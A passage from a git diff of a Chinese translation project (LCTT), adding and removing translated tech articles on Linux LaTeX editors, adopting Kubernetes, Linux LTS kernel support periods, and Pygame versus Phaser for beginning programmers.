事先说明一下,以下列表并没有一个明确的先后顺序,序号为 3 的编辑器并不一定比序号为 7 的编辑器优秀。
|
||||
|
||||
### 1\. LyX
|
||||
|
||||
![][2]
|
||||
|
||||
![][5]
|
||||
|
||||
LyX 是一个开源的 LaTeX 编辑器,即是说它是网络上可获取到的最好的文档处理引擎之一。LyX 帮助你集中于你的文章,并忘记对单词的格式化,而这些正是每个 LaTeX 编辑器应当做的。LyX 能够让你根据文档的不同,管理不同的文档内容。一旦安装了它,你就可以控制文档中的很多东西了,例如页边距,页眉,页脚,空白,缩进,表格等等。
|
||||
|
||||
假如你正忙着精心撰写科学性的文档,研究论文或类似的文档,你将会很高兴能够体验到 LyX 的公式编辑器,这也是其特色之一。 LyX 还包括一系列的教程来入门,使得入门没有那么多的麻烦。
|
||||
|
||||
[LyX][6]
|
||||
|
||||
### 2\. Texmaker
|
||||
|
||||
![][2]
|
||||
|
||||
![][7]
|
||||
|
||||
Texmaker 被认为是 GNOME 桌面环境下最好的 LaTeX 编辑器之一。它呈现出一个非常好的用户界面,带来了极好的用户体验。它也被冠以最实用的 LaTeX 编辑器之一。假如你经常进行 PDF 的转换,你将发现 TeXmaker 相比其他编辑器更加快速。在你书写的同时,你也可以预览你的文档最终将是什么样子的。同时,你也可以观察到可以很容易地找到所需要的符号。
|
||||
|
||||
Texmaker 也提供一个扩展的快捷键支持。你有什么理由不试着使用它呢?
|
||||
|
||||
[Texmaker][8]
|
||||
|
||||
### 3\. TeXstudio
|
||||
|
||||
![][2]
|
||||
|
||||
![][9]
|
||||
|
||||
假如你想要一个这样的 LaTeX 编辑器:它既能为你提供相当不错的自定义功能,又带有一个易用的界面,那么 TeXstudio 便是一个完美的选择。它的 UI 确实很简单,但是不粗糙。 TeXstudio 带有语法高亮,自带一个集成的阅读器,可以让你检查参考文献,同时还带有一些其他的辅助工具。
|
||||
|
||||
它同时还支持某些酷炫的功能,例如自动补全,链接覆盖,书签,多游标等等,这使得书写 LaTeX 文档变得比以前更加简单。
|
||||
|
||||
TeXstudio 的维护很活跃,对于新手或者高级写作者来说,这使得它成为一个引人注目的选择。
|
||||
|
||||
[TeXstudio][10]
|
||||
|
||||
### 4\. Gummi
|
||||
|
||||
![][2]
|
||||
|
||||
![][11]
|
||||
|
||||
Gummi 是一个非常简单的 LaTeX 编辑器,它基于 GTK+ 工具箱。当然,在这个编辑器中你找不到许多华丽的选项,但如果你只想能够立刻着手写作, 那么 Gummi 便是我们给你的推荐。它支持将文档输出为 PDF 格式,支持语法高亮,并帮助你进行某些基础的错误检查。尽管在 GitHub 上它已经不再被活跃地维护,但它仍然工作地很好。
|
||||
|
||||
[Gummi][12]
|
||||
|
||||
### 5\. TeXpen
|
||||
|
||||
![][2]
|
||||
|
||||
![][13]
|
||||
|
||||
TeXpen 是另一个简洁的 LaTeX 编辑器。它为你提供了自动补全功能。但其用户界面或许不会让你感到印象深刻。假如你对用户界面不在意,又想要一个超级容易的 LaTeX 编辑器,那么 TeXpen 将满足你的需求。同时 TeXpen 还能为你校正或提高在文档中使用的英语语法和表达式。
|
||||
|
||||
[TeXpen][14]
|
||||
|
||||
### 6\. ShareLaTeX
|
||||
|
||||
![][2]
|
||||
|
||||
![][15]
|
||||
|
||||
ShareLaTeX 是一款在线 LaTeX 编辑器。假如你想与某人或某组朋友一同协作进行文档的书写,那么这便是你所需要的。
|
||||
|
||||
它提供一个免费方案和几种付费方案。甚至来自哈佛大学和牛津大学的学生也都使用它来进行个人的项目。其免费方案还允许你添加一位协作者。
|
||||
|
||||
其付费方案允许你与 GitHub 和 Dropbox 进行同步,并且能够记录完整的文档修改历史。你可以为你的每个方案选择多个协作者。对于学生,它还提供单独的计费方案。
|
||||
|
||||
[ShareLaTeX][16]
|
||||
|
||||
### 7\. Overleaf
|
||||
|
||||
![][2]
|
||||
|
||||
![][17]
|
||||
|
||||
Overleaf 是另一款在线的 LaTeX 编辑器。它与 ShareLaTeX 类似,它为专家和学生提供了不同的计费方案。它也提供了一个免费方案,使用它你可以与 GitHub 同步,检查你的修订历史,或添加多个合作者。
|
||||
|
||||
在每个项目中,它对文件的数目有所限制。所以在大多数情况下如果你对 LaTeX 文件非常熟悉,这并不会为你带来不便。
|
||||
|
||||
[Overleaf][18]
|
||||
|
||||
### 8\. Authorea
|
||||
|
||||
![][2]
|
||||
|
||||
![][19]
|
||||
|
||||
Authorea 是一个美妙的在线 LaTeX 编辑器。当然,如果考虑到价格,它可能不是最好的一款。对于免费方案,它有 100 MB 的数据上传限制和每次只能创建一个私有文档。而付费方案则提供更多的额外好处,但如果考虑到价格,它可能不是最便宜的。你应该选择 Authorea 的唯一原因应该是因为其用户界面。假如你喜爱使用一款提供令人印象深刻的用户界面的工具,那就不要错过它。
|
||||
|
||||
[Authorea][20]
|
||||
|
||||
### 9\. Papeeria
|
||||
|
||||
![][2]
|
||||
|
||||
![][21]
|
||||
|
||||
Papeeria 是在网络上你能够找到的最为便宜的 LaTeX 在线编辑器,如果考虑到它和其他的编辑器一样可信赖的话。假如你想免费地使用它,则你不能使用它开展私有项目。但是,如果你更偏爱公共项目,它允许你创建不限数目的项目,添加不限数目的协作者。它的特色功能是有一个非常简便的画图构造器,并且在无需额外费用的情况下使用 Git 同步。假如你偏爱付费方案,它赋予你创建 10 个私有项目的能力。
|
||||
|
||||
[Papeeria][22]
|
||||
|
||||
### 10\. Kile
|
||||
|
||||
![Kile LaTeX 编辑器][2]
|
||||
|
||||
![Kile LaTeX 编辑器][23]
|
||||
|
||||
位于我们最好 LaTeX 编辑器清单的最后一位是 Kile 编辑器。有些朋友对 Kile 推崇备至,很大程度上是因为其提供某些特色功能。
|
||||
|
||||
Kile 不仅仅是一款编辑器,它还是一款类似 Eclipse 的 IDE 工具,提供了针对文档和项目的一整套环境。除了快速编译和预览功能,你还可以使用诸如命令的自动补全,插入引用,按照章节来组织文档等功能。你真的应该使用 Kile 来见识其潜力。
|
||||
|
||||
Kile 在 Linux 和 Windows 平台下都可获取到。
|
||||
|
||||
[Kile][24]
|
||||
|
||||
### 总结
|
||||
|
||||
所以上面便是我们推荐的 LaTeX 编辑器,你可以在 Ubuntu 或其他 Linux 发行版本中使用它们。
|
||||
|
||||
当然,我们可能还遗漏了某些可以在 Linux 上使用并且有趣的 LaTeX 编辑器。如若你正好知道它们,请在下面的评论中让我们知晓。
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://itsfoss.com/LaTeX-editors-linux/
|
||||
|
||||
作者:[Ankush Das][a]
|
||||
译者:[FSSlc](https://github.com/FSSlc)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://itsfoss.com/author/ankush/
|
||||
[1]:https://www.LaTeX-project.org/
|
||||
[2]:data:image/gif;base64,R0lGODdhAQABAPAAAP///wAAACwAAAAAAQABAEACAkQBADs=
|
||||
[3]:https://itsfoss.com/wp-content/uploads/2017/11/LaTeX-sample-example.jpeg
|
||||
[4]:https://itsfoss.com/open-source-tools-writers/
|
||||
[5]:https://itsfoss.com/wp-content/uploads/2017/10/LyX_LaTeX_editor.jpg
|
||||
[6]:https://www.LyX.org/
|
||||
[7]:https://itsfoss.com/wp-content/uploads/2017/10/texmaker_LaTeX_editor.jpg
|
||||
[8]:http://www.xm1math.net/texmaker/
|
||||
[9]:https://itsfoss.com/wp-content/uploads/2017/10/tex_studio_LaTeX_editor.jpg
|
||||
[10]:https://www.texstudio.org/
|
||||
[11]:https://itsfoss.com/wp-content/uploads/2017/10/gummi_LaTeX_editor.jpg
|
||||
[12]:https://github.com/alexandervdm/gummi
|
||||
[13]:https://itsfoss.com/wp-content/uploads/2017/10/texpen_LaTeX_editor.jpg
|
||||
[14]:https://sourceforge.net/projects/texpen/
|
||||
[15]:https://itsfoss.com/wp-content/uploads/2017/10/shareLaTeX.jpg
|
||||
[16]:https://www.shareLaTeX.com/
|
||||
[17]:https://itsfoss.com/wp-content/uploads/2017/10/overleaf.jpg
|
||||
[18]:https://www.overleaf.com/
|
||||
[19]:https://itsfoss.com/wp-content/uploads/2017/10/authorea.jpg
|
||||
[20]:https://www.authorea.com/
|
||||
[21]:https://itsfoss.com/wp-content/uploads/2017/10/papeeria_LaTeX_editor.jpg
|
||||
[22]:https://www.papeeria.com/
|
||||
[23]:https://itsfoss.com/wp-content/uploads/2017/11/kile-LaTeX-800x621.png
|
||||
[24]:https://kile.sourceforge.io/
|
90
translated/tech/20171120 Adopting Kubernetes step by step.md
Normal file
90
translated/tech/20171120 Adopting Kubernetes step by step.md
Normal file
@ -0,0 +1,90 @@
|
||||
一步步采用 Kubernetes
|
||||
============================================================
|
||||
|
||||
为什么选择 Docker 和 Kubernetes 呢?
|
||||
|
||||
容器允许我们构建,发布和运行分布式应用。他们使应用程序摆脱了机器限制,让我们以一定的方式创建一个复杂的应用程序。
|
||||
|
||||
使用容器编写应用程序可以使开发,QA 更加接近生产环境(如果你努力这样做的话)。通过这样做,可以更快地发布修改,并且可以更快地测试整个系统。
|
||||
|
||||
[Docker][1] 可以使软件独立于云提供商的容器化平台。
|
||||
|
||||
但是,即使使用容器,移植应用程序到任何一个云提供商(或私有云)所需的工作量也是非常重要的。应用程序通常需要自动伸缩组,持久远程光盘,自动发现等。但是每个云提供商都有不同的机制。如果你想使用这些功能,很快你就会变的依赖于云提供商。
|
||||
|
||||
这正是 [Kubernetes][2] 登场的时候。它是一个容器编排系统,它允许您以一定的标准管理,缩放和部署应用程序的不同部分,并且成为其中的重要工具。它抽象出来以兼容主要云的提供商(Google Cloud,Amazon Web Services 和 Microsoft Azure 都支持 Kubernetes)。
|
||||
|
||||
通过一个方法来想象一下应用程序,容器和 Kubernetes 。应用程序可以视为一条身边的鲨鱼,它存在于海洋中(在这个例子中,海洋就是您的机器)。海洋中可能还有其他一些宝贵的东西,但是你不希望你的鲨鱼与小丑鱼有什么关系。所以需要把你的鲨鱼(你的应用程序)移动到一个密封的水族馆中(容器)。这很不错,但不是特别的健壮。你的水族馆可能会打破,或者你想建立一个通道连接到其他鱼类生活的另一个水族馆。也许你想要许多这样的水族馆,以防需要清洁或维护... 这正是应用 Kubernetes 集群的地方。
|
||||
|
||||
![](https://cdn-images-1.medium.com/max/1600/1*OVt8cnY1WWOqdLFycCgdFg.jpeg)
|
||||
Evolution to Kubernetes
|
||||
|
||||
Kubernetes 由云提供商提供支持,从开发到生产,它使您和您的团队能够更容易地拥有几乎相同的环境。这是因为 Kubernetes 不依赖专有软件,服务或另外一些基础设施。
|
||||
|
||||
事实上,您可以在您的机器中使用与生产环境相同的部件启动应用程序,从而缩小了开发和生产环境之间的差距。这使得开发人员更了解应用程序是如何构建在一起的,尽管他们可能只负责应用程序的一部分。这也使得在开发流程中的应用程序更容易的快速完成测试。
|
||||
|
||||
如何使用 Kubernetes 工作?
|
||||
|
||||
随着更多的人采用 Kubernetes,新的问题出现了;应该如何针对基于集群环境开发?假设有 3 个环境,开发,质量保证和生产, 如何适应 Kubernetes?这些环境之间仍然存在着差异,无论是在开发周期(例如:在正在运行的应用程序中看到修改代码所花费的时间)还是与数据相关的(例如:我不应该在我的质量保证环境中测试生产数据,因为它里面有敏感信息)
|
||||
|
||||
那么,我是否应该总是在 Kubernetes 集群中编码,构建映像,重新部署服务?或者,我是否不应该尽力让我的开发环境也成为一个 Kubernetes 集群的其中之一(或一组集群)呢?还是,我应该以混合方式工作?
|
||||
|
||||
![](https://cdn-images-1.medium.com/max/1600/1*MXokxD8Ktte4_vWvTas9uw.jpeg)
|
||||
Development with a local cluster
|
||||
|
||||
如果继续我们之前的比喻,使其保持在一个开发集群中的同时侧面的通道代表着修改应用程序的一种方式。这通常通过[volumes][4]来实现
|
||||
|
||||
一个 Kubernetes 系列
|
||||
|
||||
Kubernetes 系列资源是开源的,可以在这里找到:
|
||||
|
||||
### [https://github.com/red-gate/ks][5]
|
||||
|
||||
我们写这个系列作为练习以不同的方式构建软件。我们试图约束自己在所有环境中都使用 Kubernetes,以便我们可以探索这些技术对数据和数据库的开发和管理造成影响。
|
||||
|
||||
这个系列从使用 Kubernetes 创建基本的React应用程序开始,并逐渐演变为能够覆盖我们更多开发需求的系列。最后,我们将覆盖所有应用程序的开发需求,并且理解在数据库生命周期中如何最好地迎合容器和集群。
|
||||
|
||||
以下是这个系列的前 5 部分:
|
||||
|
||||
1. ks1: 使用 Kubernetes 构建一个React应用程序
|
||||
|
||||
2. ks2: 使用 minikube 检测 React 代码的更改
|
||||
|
||||
3. ks3: 添加一个提供 API 的 Python Web 服务器
|
||||
|
||||
4. ks4: 使 minikube 检测 Python 代码的更改
|
||||
|
||||
5. ks5: 创建一个测试环境
|
||||
|
||||
本系列的第二部分将添加一个数据库,并尝试找出最好的方式来发展我们的应用程序。
|
||||
|
||||
|
||||
通过在所有环境中运行 Kubernetes,我们被迫在解决新问题的时候也尽量保持开发周期。我们不断尝试 Kubernetes,并越来越习惯它。通过这样做,开发团队都可以对生产环境负责,这并不困难,因为所有环境(从开发到生产)都以相同的方式进行管理。
|
||||
|
||||
下一步是什么?
|
||||
|
||||
我们将通过整合数据库和练习来继续这个系列,以找到使用 Kubernetes 获得数据库生命周期的最佳体验方法。
|
||||
|
||||
这个 Kubernetes 系列是由 Redgate 研发部门的 Foundry 提供。我们正在努力使数据和容器的管理变得更加容易,所以如果您正在处理数据和容器,我们希望听到您的意见,请直接联系我们的开发团队。 [_foundry@red-gate.com_][6]
|
||||
* * *
|
||||
|
||||
我们正在招聘。您是否有兴趣开发产品,创建[未来技术][7] 并采取类似创业的方法(没有风险)?看看我们的[软件工程师 - 未来技术][8]的角色吧,并阅读更多关于在 [英国剑桥][9]的 Redgate 工作的信息。
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://medium.com/ingeniouslysimple/adopting-kubernetes-step-by-step-f93093c13dfe
|
||||
|
||||
作者:[santiago arias][a]
|
||||
译者:[aiwhj](https://github.com/aiwhj)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://medium.com/@santiaago?source=post_header_lockup
|
||||
[1]:https://www.docker.com/what-docker
|
||||
[2]:https://kubernetes.io/
|
||||
[3]:https://www.google.co.uk/search?biw=723&bih=753&tbm=isch&sa=1&ei=p-YCWpbtN8atkwWc8ZyQAQ&q=nemo+fish&oq=nemo+fish&gs_l=psy-ab.3..0i67k1l2j0l2j0i67k1j0l5.5128.9271.0.9566.9.9.0.0.0.0.81.532.9.9.0....0...1.1.64.psy-ab..0.9.526...0i7i30k1j0i7i10i30k1j0i13k1j0i10k1.0.FbAf9xXxTEM
|
||||
[4]:https://kubernetes.io/docs/concepts/storage/volumes/
|
||||
[5]:https://github.com/red-gate/ks
|
||||
[6]:mailto:foundry@red-gate.com
|
||||
[7]:https://www.red-gate.com/foundry/
|
||||
[8]:https://www.red-gate.com/our-company/careers/current-opportunities/software-engineer-future-technologies
|
||||
[9]:https://www.red-gate.com/our-company/careers/living-in-cambridge
|
@ -1,45 +0,0 @@
|
||||
Linux 长期支持版关于未来的声明
|
||||
===============================
|
||||
Linux 4.4 长期支持版将得到 6 年的使用期,但是这并不意味着其它长期支持版的使用期将持续这么久。
|
||||
[视频](http://www.zdnet.com/video/video-torvalds-surprised-by-resilience-of-2-6-kernel-1/)
|
||||
_视频: Torvalds 对内核版本 2.6 的弹性感到惊讶_
|
||||
|
||||
在 2017 年 10 月,[Linux 内核小组同意将 Linux 长期支持版(LTS)的下一个版本的生命期从两年延长至六年][5],而 LTS 的下一个版本正是 [Linux 4.14][6]。这对于 [Android][7],嵌入式 Linux 和 Linux 物联网(IoT)的开发者们是一个利好。但是这个变动并不意味着将来所有的 Linux LTS 版本将有 6 年的使用期。
|
||||
正如 [Linux 基金会][8]的 IT 技术设施安全主管 Konstantin Ryabitsev 在 google+ 上发文解释说,"尽管外面的各种各样的新闻网站可能已经告知你们,但是[内核版本 4.14 的 LTS 并不计划支持 6 年][9]。仅仅因为 Greg Kroah-Hartman 正在为 LTS 4.4 版本做这项工作并不表示从现在开始所有的 LTS 内核会维持那么久。"
|
||||
所以,简而言之,Linux 4.14 将支持到 2020年 1月份,而 2016 年 1 月 20 号问世的 Linux 4.4 内核将支持到 2022 年。因此,如果你正在编写一个打算能够长期运行的 Linux 发行版,那你需要基于 [Linux 4.4 版本][10]。
|
||||
[Linux LTS 版本][11]包含对旧内核树的后向移植漏洞的修复。不是所有漏洞的修复都被导入进来,只有重要漏洞的修复才用于这些内核中。它们不会非常频繁的发布,特别是对那些旧版本的内核树来说。
|
||||
Linux 其它的版本有尝鲜版或发布候选版(RC),主线版,稳定版和 LTS 版。
|
||||
RC 版必须从源代码编译并且通常包含漏洞的修复和新特性。这些都是由 Linux Torvalds 维护和发布的。他也维护主线版本树(这是所有新特性被引入的地方)。新的主线内核每几个月发布一次。当主线版本树为了通用才发布时,它被称为"稳定版"。一个稳定版内核漏洞的修复是从主线版本树后向移植的,并且这些修复是由一个指定的稳定版内核维护者来申请。在下一个主线内核变得可用之前,通常也有一些修复漏洞的内核发布。
|
||||
对于最新的 LTS 版本,Linux 4.14,Ryabitsev 说,"Greg 已经担负起了 4.14 版本的维护者责任(过去发生过多次),其他人想成为该版本的维护者也是有可能的,但是你应该断然不要去计划这件事。"
|
||||
Kroah-Hartman 在 Ryabitsev 的文章中仅仅添加了:"[他的言论][12]"
|
||||
|
||||
-------------------
|
||||
via: http://www.zdnet.com/article/long-term-linux-support-future-clarified/
|
||||
|
||||
作者:[Steven J. Vaughan-Nichols ][a]
|
||||
译者:[liuxinyu123](https://github.com/liuxinyu123)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:http://www.zdnet.com/meet-the-team/us/steven-j-vaughan-nichols/
|
||||
[1]:http://www.zdnet.com/article/long-term-linux-support-future-clarified/#comments-eb4f0633-955f-4fec-9e56-734c34ee2bf2
|
||||
[2]:http://www.zdnet.com/article/the-tension-between-iot-and-erp/
|
||||
[3]:http://www.zdnet.com/article/the-tension-between-iot-and-erp/
|
||||
[4]:http://www.zdnet.com/article/the-tension-between-iot-and-erp/
|
||||
[5]:http://www.zdnet.com/article/long-term-support-linux-gets-a-longer-lease-on-life/
|
||||
[6]:http://www.zdnet.com/article/the-new-long-term-linux-kernel-linux-4-14-has-arrived/
|
||||
[7]:https://www.android.com/
|
||||
[8]:https://www.linuxfoundation.org/
|
||||
[9]:https://plus.google.com/u/0/+KonstantinRyabitsev/posts/Lq97ZtL8Xw9
|
||||
[10]:http://www.zdnet.com/article/whats-new-and-nifty-in-linux-4-4/
|
||||
[11]:https://www.kernel.org/releases.html
|
||||
[12]:https://plus.google.com/u/0/+gregkroahhartman/posts/ZUcSz3Sn1Hc
|
||||
[13]:http://www.zdnet.com/meet-the-team/us/steven-j-vaughan-nichols/
|
||||
[14]:http://www.zdnet.com/meet-the-team/us/steven-j-vaughan-nichols/
|
||||
[15]:http://www.zdnet.com/blog/open-source/
|
||||
[16]:http://www.zdnet.com/topic/enterprise-software/
|
||||
|
||||
|
||||
|
||||
|
@ -0,0 +1,140 @@
|
||||
为什么说 Python 和 Pygame 最适合初学者
|
||||
============================================================
|
||||
|
||||
### 我们有三个理由来说明 Pygame 对初学编程者是最好的选择。
|
||||
|
||||
|
||||
![What's the best game platform for beginning programmers?](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/code_development_programming.png?itok=M_QDcgz5 "What's the best game platform for beginning programmers?")
|
||||
图片来源: [opensource.com](https://opensource.com)
|
||||
|
||||
上个月,[Scott Nesbitt][10] 发表了一篇标题为[ Mozilla 支出 50 万美元来支持开源项目][11]的文章。其中 Phaser,一个基于 HTML/JavaScript 的游戏平台项目,获得了 50,000 美元的奖励。整整一年里,我都在使用 Phaser 平台来教我的小女儿,用来学习的话,它是最简单也是最好的 HTML 游戏开发平台。然而,对于初学者来说,使用[ Pygame ][13]也许效果更好。原因如下:
|
||||
|
||||
### 1\. 小段代码块
|
||||
|
||||
Pygame 基于 Python,而 Python 是[计算机入门课程中最流行的教学语言][14]。Python 非常适合用一小段代码来实现我们的想法,孩子们可以从单个文件和单个代码块起开始学习,在掌握函数 (function) 或类 (class) 对象之前,就可以写出意大利面条似的代码。 很像手指画,所想即所得。
|
||||
|
||||
更多 Python 资源链接
|
||||
|
||||
* [Python 是什么?][1]
|
||||
|
||||
* [最热门 Python IDEs][2]
|
||||
|
||||
* [最热门 Python GUI 框架][3]
|
||||
|
||||
* [最新 Python 话题][4]
|
||||
|
||||
* [更多开发资源][5]
|
||||
|
||||
以这样的方式来学习,当编写的代码越来越难于管理的时候,孩子们很自然就的就会把代码分解成函数模块和类模块。在学习函数之前就学习了 Python 语言的语法,学生将掌握基本的编程知识,对了解全局作用域和局部作用域起到更好的作用。
|
||||
|
||||
大多数 HTML 游戏在一定程度上会将结构、样式和编程逻辑分为 HTML、CSS和JavaScript,并且需要 CSS 和 HTML 的知识。从长远来看,虽然拆分更好,但对初学者来说是个障碍。一旦孩子们发现他们可以用 HTML 和 CSS 快速构建网页,很有可能就会被颜色、字体和图形的视觉刺激分散注意力。即使有仅仅只专注于 JavaScript 代码的,也需要学习基本的文档结构模型,以使 JavaScript 代码能够嵌入进去。
|
||||
|
||||
### 2\. 全局变量更清晰
|
||||
|
||||
Python 和 JavaScript 都使用动态类型变量,这意味着变量只有在赋值才能确定其类型为一个字符串、一个整数或一个浮点数,其中 JavaScript 更容易出错。类似于类型变量,JavaScript 和 Python 都有全局变量和局部变量之分。Python 中,如果在函数块内要使用全局变量,就会以 `global` 关键字区分出来。
|
||||
|
||||
要理解在 Phaser 上教授编程初学者所面临的挑战的话,让我们以基本的[制作您的第一个 Phaser 游戏教程][15]为例子,它是由 Alvin Ourrad 和 Richard Davey 开发制作的。在 JavaScript 中,程序中任何地方都可以访问的全局变量很难追踪调试,常常引起 Bug 且很难解决。因为 Richard 和 Alvin 是专业程序员,所以在这儿特意使用全局变量以使程序简洁。
|
||||
|
||||
```
|
||||
var game = new Phaser.Game(800, 600, Phaser.AUTO, '', { preload: preload, create: create, update: update });
|
||||
|
||||
function preload() {
|
||||
|
||||
game.load.image('sky', 'assets/sky.png');
|
||||
|
||||
}
|
||||
|
||||
var player;
|
||||
var platforms;
|
||||
|
||||
function create() {
|
||||
game.physics.startSystem(Phaser.Physics.ARCADE);
|
||||
…
|
||||
```
|
||||
|
||||
在他们的 Phaser 编程手册 [《Interphase》][16] 中,Richard Davey 和 Ilija Melentijevic 解释说:在很多 Phaser 项目中通常都会使用全局变量,原因是使用它们完成任务更容易、更快捷。
|
||||
|
||||
> “如果您开发过游戏,只要代码量到一定规模,那么(使用全局变量)这种做法会使您陷入困境的,可是我们为什么还要这样做?原因很简单,仅仅只是要使我们的 Phaser 项目容易完成,更简单而已。”
|
||||
|
||||
针对一个 Phaser 应用程序,虽然可以使用局部变量和拆分代码块来达到关注点隔离这些手段来重构代码,但要使第一次学习编程的小孩能理解,显然很有难度的。
|
||||
|
||||
如果您想教你的孩子学习 JavaScript,或者如果他们已经知道怎样使用像 Python 来编程的话,有个好的 Phaser 课程推荐: [完整的手机游戏开发课程] [17],是由 [ Pablo Farias Navarro ] [18] 开发制作的。虽然标题看着是移动游戏,但实际是关于 JavaScript 和 Phaser 的。JavaScript 和 Phaser 移动应用开发已经转移到 [PhoneGap][19] 话题去了。
|
||||
|
||||
### 3\. Pygame 无依赖要求
|
||||
|
||||
由于 [Python Wheels][20] 的出现,Pygame 超级[容易安装][21]。在 Fedora/Red Hat 系统下也可使用 **yum** 包管理器来安装:
|
||||
|
||||
```
|
||||
sudo yum install python3-pygame
|
||||
```
|
||||
|
||||
更多消息请参考官网[Pygame 安装说明文档][22]。
|
||||
|
||||
相比来说,虽然 Phaser 本身更容易安装,但需要掌握更多的知识。前面提到的,学生需要在 HTML 文档中组装他们的 JavaScript 代码,同时还需要些 CSS。除了这三种语言(HTML、CSS、JavaScript),还需要使用火狐或谷歌开发工具和编辑器。JavaScript 最常用的编辑器有 Sublime、Atom、VS Code(按使用多少排序)等。
|
||||
|
||||
由于[浏览器同源策略][23]的原因,如果您直接在浏览器中打开 HTML 文件的话,Phaser 应用是不会运行的。您必须运行 Web 服务,并通过服务访问这些文件。还好,对于大多数工程项目,可以不用在本地运行 Apache 服务,只需要运行一些轻量级的服务就可以,比如 [httpster][24]。
|
||||
|
||||
### Phaser 和 JavaScript 的优势
|
||||
|
||||
JavaScript 和 Phaser 有着种种的不足,为什么我还继续教授它们?老实说,我考虑了很长一段时间,我一直担心学生在学习变量声明提升和变量作用域时会遇到困难。所以我先开发出了基于 Pygame 和 Python 的课程,随后又开发出一套基于 Phaser 的课程。最终,我决定使用 Pablo 预先制定的课程作为起点。
|
||||
|
||||
我转用 JavaScript 有两个原因。首先,JavaScript 已经成为正式应用的正式语言。除了 Web 应用外,也可使用于移动和服务应用方面。JavaScript 无处不在,其广泛应用于孩子们每天都能看到的应用中。如果他们的朋友使用 Javascript 来编程,他们很可能也会受影响而使用之。正如我看到了 JavaScript 背后的动力,所以深入研究了可编译成 JavaScript 的替代语言,主要是 Dart 和 TypeScript 两种。虽然我不介意额外的转换步骤,但还是最喜欢 JavaScript。
|
||||
|
||||
最后,我选择使用 Phaser 和 JavaScript 的组合,是因为我意识到上面那些问题在 JavaScript 可以被解决,仅仅只是一些工作量而已。高质量的调试工具和一些大牛们的人的工作使得 JavaScript 成为教育孩子编码的可用和有用的语言。
|
||||
|
||||
### 最后话题: Python 对垒 JavaScript
|
||||
|
||||
当家长问我使用的什么语言作为孩子的入门语言时,我会立即推荐 Python 和 Pygame。因为有成千上万的课程可选,而且大多数都是免费的。我为我的儿子选择了 Al Sweigart 的 [使用 Python 和 Pygame 开发游戏][25] 课程,同时也在使用 Allen B. Downey 的 [Python 编程思想:如何像计算机科学家一样思考][7]。在 Android 手机上可以使用 [Tom Rothamel][27] 的 [RAPT Pygame][26] 来安装 Pygame 游戏。
|
||||
|
||||
那是好事。JavaScript 是一门成熟的编程语言,有很多很多辅助工具。但有多年的帮助大儿子使用 Python 创建炫酷游戏经历的我,依然钟情于 Python 和 Pygame。
|
||||
|
||||
### About the author
|
||||
|
||||
[![](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/craig-head-crop.png?itok=LlMnIq8m)][28]
|
||||
|
||||
Craig Oda - First elected president and co-founder of Tokyo Linux Users Group. Co-author of "Linux Japanese Environment" book published by O'Reilly Japan. Part of core team that established first ISP in Asia. Former VP of product management and product marketing for major Linux company. Partner at Oppkey, developer relations consulting firm in Silicon Valley.[More about me][8]
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://opensource.com/article/17/11/pygame
|
||||
|
||||
作者:[Craig Oda ][a]
|
||||
译者:[runningwater](https://github.com/runningwater)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://opensource.com/users/codetricity
|
||||
[1]:https://opensource.com/resources/python?intcmp=7016000000127cYAAQ
|
||||
[2]:https://opensource.com/resources/python/ides?intcmp=7016000000127cYAAQ
|
||||
[3]:https://opensource.com/resources/python/gui-frameworks?intcmp=7016000000127cYAAQ
|
||||
[4]:https://opensource.com/tags/python?intcmp=7016000000127cYAAQ
|
||||
[5]:https://developers.redhat.com/?intcmp=7016000000127cYAAQ
|
||||
[6]:https://opensource.com/article/17/11/pygame?rate=PV7Af00S0QwicZT2iv8xSjJrmJPdpfK1Kcm7LXxl_Xc
|
||||
[7]:http://greenteapress.com/thinkpython/html/index.html
|
||||
[8]:https://opensource.com/users/codetricity
|
||||
[9]:https://opensource.com/user/46031/feed
|
||||
[10]:https://opensource.com/users/scottnesbitt
|
||||
[11]:https://opensource.com/article/17/10/news-october-14
|
||||
[12]:https://www.patreon.com/photonstorm/posts
|
||||
[13]:https://www.pygame.org/news
|
||||
[14]:https://cacm.acm.org/blogs/blog-cacm/176450-python-is-now-the-most-popular-introductory-teaching-language-at-top-u-s-universities/fulltext
|
||||
[15]:http://phaser.io/tutorials/making-your-first-phaser-game
|
||||
[16]:https://phaser.io/interphase
|
||||
[17]:https://academy.zenva.com/product/the-complete-mobile-game-development-course-platinum-edition/
|
||||
[18]:https://gamedevacademy.org/author/fariazz/
|
||||
[19]:https://phonegap.com/
|
||||
[20]:https://pythonwheels.com/
|
||||
[21]:https://pypi.python.org/pypi/Pygame
|
||||
[22]:http://www.pygame.org/wiki/GettingStarted#Pygame%20Installation
|
||||
[23]:https://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
|
||||
[24]:https://simbco.github.io/httpster/
|
||||
[25]:https://inventwithpython.com/makinggames.pdf
|
||||
[26]:https://github.com/renpytom/rapt-pygame-example
|
||||
[27]:https://github.com/renpytom
|
||||
[28]:https://opensource.com/users/codetricity
|
||||
[29]:https://opensource.com/users/codetricity
|
||||
[30]:https://opensource.com/users/codetricity
|
||||
[31]:https://opensource.com/article/17/11/pygame#comments
|
||||
[32]:https://opensource.com/tags/python
|
||||
[33]:https://opensource.com/tags/programming
|
@ -0,0 +1,146 @@
|
||||
2018 年开源技术 10 大发展趋势
|
||||
============================================================
|
||||
|
||||
### 你是否关注过开源技术的发展趋势?
|
||||
|
||||
